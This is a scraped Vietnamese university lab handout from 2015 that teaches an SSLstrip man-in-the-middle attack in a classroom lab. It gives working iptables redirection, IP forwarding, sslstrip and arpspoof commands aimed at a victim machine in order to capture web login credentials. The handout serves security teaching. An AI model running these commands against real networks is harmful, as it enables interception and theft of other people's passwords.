5
Ver 1.1 2015, FIT, HCMUP Bo mt và An ninh mng : LAB 03] Ths. Lương Trần Hy Hiến, KHOA CNTT TRƯỜNG ĐH SƯ PHẠM TP. HCM 1 SSLSTRIP – MAN IN THE MIDDLE 1 Gii thiu SSL Strip là công cụ tương tác ở quá trình chuyển từ http sang https của các ứng dụng web. SSL Strip là một công cụ hữu hiệu để capture được username/password login của các ứng dụng web. SSL Strip được cài sẵn trong máy Kali Linux. 2 Chun bChuẩn bị máy với yêu cầu cụ thể: 1) Máy thật (hoặc ảo) Windows XP/Windows 7 để làm máy nạn nhân (victim) 2) Máy ảo Kali Linux (máy giả mạo) đã cài sẵn dịch vị SSLstripXem thư mục: Lưu ý: Phải cấu hình máy ảo dạng Bridged (Network Adapter = Bridged) để cùng mạng. 3 Mô hình Lab

Ver 1.1 2015, FIT, HCMUP B SS STR P – A T · Ver 1.1 – 2015, FIT, HCMUP Bảo mật và An ninh mạng : LAB 03] Ths. Lương Trần Hy Hiến, KHOA CNTT – TRƯỜNG ĐH SƯ

  • Upload
    others

  • View
    0

  • Download
    0

Embed Size (px)

Citation preview

Page 1: Ver 1.1 2015, FIT, HCMUP B SS STR P – A T · Ver 1.1 – 2015, FIT, HCMUP Bảo mật và An ninh mạng : LAB 03] Ths. Lương Trần Hy Hiến, KHOA CNTT – TRƯỜNG ĐH SƯ

Ver 1.1 – 2015, FIT, HCMUP Bảo mật và An ninh mạng : LAB 03]

Ths. Lương Trần Hy Hiến, KHOA CNTT – TRƯỜNG ĐH SƯ PHẠM TP. HCM 1

SSLSTRIP – MAN IN THE MIDDLE 1 Giới thiệu

SSL Strip là công cụ tương tác ở quá trình chuyển từ http sang https của các ứng

dụng web. SSL Strip là một công cụ hữu hiệu để capture được

username/password login của các ứng dụng web.

SSL Strip được cài sẵn trong máy Kali Linux.

2 Chuẩn bị

Chuẩn bị máy với yêu cầu cụ thể:

1) Máy thật (hoặc ảo) Windows XP/Windows 7 để làm máy nạn nhân (victim)

2) Máy ảo Kali Linux (máy giả mạo) đã cài sẵn dịch vị SSLstripXem thư mục:

Lưu ý: Phải cấu hình máy ảo dạng Bridged (Network Adapter = Bridged) để cùng

mạng.

3 Mô hình Lab

Page 2: Ver 1.1 2015, FIT, HCMUP B SS STR P – A T · Ver 1.1 – 2015, FIT, HCMUP Bảo mật và An ninh mạng : LAB 03] Ths. Lương Trần Hy Hiến, KHOA CNTT – TRƯỜNG ĐH SƯ

Ver 1.1 – 2015, FIT, HCMUP Bảo mật và An ninh mạng : LAB 03]

Ths. Lương Trần Hy Hiến, KHOA CNTT – TRƯỜNG ĐH SƯ PHẠM TP. HCM 2

4 Các bước thực hiện

4.1 Xác định địa chỉ IP các máy

Sử dụng máy ảo window xp làm victim (máy nạn nhân) có ip 10.27.4.38 default gateway:

10.37.4.1, máy tấn công Kali có ip 10.37.4.233

Page 3: Ver 1.1 2015, FIT, HCMUP B SS STR P – A T · Ver 1.1 – 2015, FIT, HCMUP Bảo mật và An ninh mạng : LAB 03] Ths. Lương Trần Hy Hiến, KHOA CNTT – TRƯỜNG ĐH SƯ

Ver 1.1 – 2015, FIT, HCMUP Bảo mật và An ninh mạng : LAB 03]

Ths. Lương Trần Hy Hiến, KHOA CNTT – TRƯỜNG ĐH SƯ PHẠM TP. HCM 3

Có thể xem default gateway của máy Kali bằng lệnh netstat -nr

4.2 IP Forwarding

Trên máy attacker, ta bật (enable) chức năng ipv4 forward để tiến hành arp poisoning:

echo 1 > /proc/sys/net/ipv4/ip_forward

Có thể kiểm tra lại bằng lệnh cat:

4.3 Chuyển hướng gói tin

Dùng iptables để chuyển tất cả gói tin tcp ở port 80 chuyển sang port bất kỳ, ở đây là port

8000. Port này là port listen của sslstrip sau này.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j

REDIRECT --to-port <listenPort>

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j

REDIRECT --to-port 8000

Page 4: Ver 1.1 2015, FIT, HCMUP B SS STR P – A T · Ver 1.1 – 2015, FIT, HCMUP Bảo mật và An ninh mạng : LAB 03] Ths. Lương Trần Hy Hiến, KHOA CNTT – TRƯỜNG ĐH SƯ

Ver 1.1 – 2015, FIT, HCMUP Bảo mật và An ninh mạng : LAB 03]

Ths. Lương Trần Hy Hiến, KHOA CNTT – TRƯỜNG ĐH SƯ PHẠM TP. HCM 4

4.4 Chạy SSLStrip

Chạy sslstrip listen ở port đã chọn ở trên (port 8000):

sslstrip -l <listenPort>

4.5 MitM with ARPSpoof

Tiến hành arpspoof (giả địa chỉ MAC máy victim):

arpspoof -i <interface> -t <targetIP> <gatewayIP>

Với máy victim với ip máy victim là 10.37.4.72 và default gateway là 10.37.4.1, gõ

lệnh:

arpspoof -i eth0 -t 10.37.4.72 10.37.4.1

Page 5: Ver 1.1 2015, FIT, HCMUP B SS STR P – A T · Ver 1.1 – 2015, FIT, HCMUP Bảo mật và An ninh mạng : LAB 03] Ths. Lương Trần Hy Hiến, KHOA CNTT – TRƯỜNG ĐH SƯ

Ver 1.1 – 2015, FIT, HCMUP Bảo mật và An ninh mạng : LAB 03]

Ths. Lương Trần Hy Hiến, KHOA CNTT – TRƯỜNG ĐH SƯ PHẠM TP. HCM 5

4.6 Thử kết nối web http trên máy victim

4.7 Dừng dịch vụ sslstrip

Ctrl + C

4.8 Xem và phân tích file sslstrip.log

5 Tham khảo

[1] http://bahansen.info/the-attack/execution/attack-vector-1-sslstrip/

[2] https://sites.google.com/site/clickdeathsquad/Home/cds-sslstripping